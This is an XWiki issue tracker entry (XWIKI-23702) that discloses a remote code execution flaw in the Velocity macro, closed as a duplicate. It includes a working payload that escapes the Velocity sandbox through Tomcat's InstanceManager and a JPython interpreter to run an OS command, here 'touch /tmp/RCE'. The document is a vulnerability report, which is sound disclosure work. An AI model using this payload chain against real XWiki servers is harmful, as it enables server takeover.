Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-23702

Remote Code Execution via Velocity scripts (Macro)

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      A Remote Code Execution (RCE) vulnerability exists in the Velocity macro and can be exploited by an authenticated user with script permissions.
      The application allows users to create Velocity scripts; consequently, an attacker can inject arbitrary Velocity expressions or other malicious template syntax that are evaluated server-side, bypassing the Velocity sandbox.
      By crafting a specially designed payload, the attacker can execute arbitrary commands on the underlying operating system with the privileges of the web application.

      Payload :

      $request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")

      Attachments

        Issue Links

          duplicates

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-23698 Remote Code Execution via the page title using Velocity

          • Major - Major loss of function.
          • Closed

          Activity

            People

              surli Simon Urli
              isfake Youssef Azefzaf
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: